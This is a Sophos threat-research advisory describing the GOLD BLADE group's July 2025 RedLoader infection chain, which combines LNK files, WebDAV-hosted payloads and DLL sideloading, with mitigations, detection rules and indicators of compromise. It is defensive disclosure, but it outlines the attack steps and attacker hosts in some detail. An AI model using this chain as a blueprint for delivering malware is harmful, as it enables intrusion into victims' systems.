Source: news.sophos.com – Author: mindimcdowell
Attacks surged in July 2025 after the threat group updated its process to combine malicious LNK files and a recycled WebDAV technique
Sophos analysts are investigating a new infection chain for the GOLD BLADE cybercriminal group’s custom RedLoader malware, which initiates command and control (C2) communications. The threat actors leverage a LNK file to remotely execute and sideload a benign executable, which loads the RedLoader stage 1 payload that is hosted on GOLD BLADE infrastructure. The threat actors previously used these techniques individually: the use of WebDAV to execute remotely hosted DLLs was observed in September 2024, and the sideloading of a renamed ADNotificationManager.exe file was observed in March 2025. However, the combination observed in July 2025 represents a method for initial execution that has not been publicly reported.
Execution chain
Figure 1 illustrates the execution chain. The attack starts with a threat actor sending a well-crafted cover letter PDF to a target via a third-party job site such as ‘indeed.com’.
Figure 1: RedLoader execution chain. (Source: Sophos)
- A malicious link in the PDF downloads a ZIP archive to the victim’s system. The archive contains a LNK file that masquerades as a PDF.
- The LNK file executes conhost.exe.
- This executable leverages WebDAV to contact a CloudFlare domain (automatinghrservices[.] workers[.]dev). A renamed signed version of the Adobe ADNotificationManager.exe executable masquerades as a resume and is remotely hosted on the attacker-controlled server (dav[.]automatinghrservices[.]workers[.]dev @ SSLDavWWWRootCV-APP-2012-68907872.exe). This file resides in the same directory as the RedLoader stage 1 DLL file (netutils.dll).
- Upon execution, the renamed benign executable remotely sideloads the malicious DLL (netutils.dll), marking the beginning of the RedLoader infection chain.
- RedLoader stage 1 creates a scheduled task named ‘BrowserQEBrowserQE_
’ on the victim’s system and downloads a standalone executable for stage 2 from ‘live[.]airemoteplant[.]workers[.]dev’. The use of a standalone executable deviates from the activity observed in September 2024 and resembles the infection chain that Trend Micro reported in March 2024. - The scheduled task uses PCALua.exe and conhost.exe to execute RedLoader stage 2, a custom executable named ‘BrowserQE_
.exe’. While this executable name is victim-specific, the SHA256 hash is consistent across all samples observed by Sophos analysts. - RedLoader stage 2 communicates with its C2 server.
Mitigations
The July activity shows how threat actors can combine prior techniques to modify their attack chain and bypass defenses. GOLD BLADE continues to rely heavily on LNK files that impersonate other file types. Organizations can mitigate this threat by deploying a Software Restriction Policy Group Policy Object that blocks LNK file execution from common directories leveraged by malware. These directories include ‘C:Users*Downloads*.lnk’, ‘%AppDataLocal%*.lnk’, and ‘%AppDataRoaming%*.lnk’.
The Sophos protections listed in Table 1 will address this activity.
| Name | Description |
| Evade_28k | Blocks specific versions of adnotificationmanager.exe regardless of DLL name from DLL sideloading |
| WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1 | Identifies suspicious child processes of conhost.exe where the process path is not ‘Windowssplwow64.exe’, ‘WindowsSystem32WerFault.exe’, or ‘WindowsSystem32conhost.exe’ |
| Troj/Agent-BLKU | Static detection for RedLoader stage 2 |
Table 1: Sophos countermeasures covering this threat.
To mitigate exposure to this malware, organizations can use available controls to review and restrict access using the indicators listed in Table 2. The domains may contain malicious content, so consider the risks before opening them in a browser.
| Indicator | Type | Context |
| automatinghrservices[.]workers[.]dev | Domain name | GOLD BLADE C2 server |
| quiet[.]msftlivecloudsrv[.]workers[.]dev | Domain name | GOLD BLADE C2 server |
| live[.]airemoteplant[.]workers[.]dev | Domain name | GOLD BLADE C2 server |
| netutils.dll | Filename | RedLoader stage 1 deployed by GOLD BLADE via remote DLL sideloading |
| d302836c7df9ce8ac68a06b53263e2c685971781a48ce56b3b5a579c5bba10cc | SHA256 hash | RedLoader stage 1 deployed by GOLD BLADE via remote DLL sideloading |
| f5203c7ac07087fd5029d83141982f0a5e78f169cdc4ab9fc097cc0e2981d926 | SHA256 hash | RedLoader stage 2 deployed by GOLD BLADE |
| 369acb06aac9492df4d174dbd31ebfb1e6e0c5f3 | SHA1 hash | RedLoader stage 2 deployed by GOLD BLADE |
Table 2: Indicators for this threat.
Original Post URL: https://news.sophos.com/en-us/2025/07/29/gold-blade-remote-dll-sideloading-attack-deploys-redloader/
Category & Tags: Threat Research,.lnk,cybercrime,DLL sideloading,featured,GOLD BLADE,RedLoader,Sophos X-Ops,webdav – Threat Research,.lnk,cybercrime,DLL sideloading,featured,GOLD BLADE,RedLoader,Sophos X-Ops,webdav
Views: 2
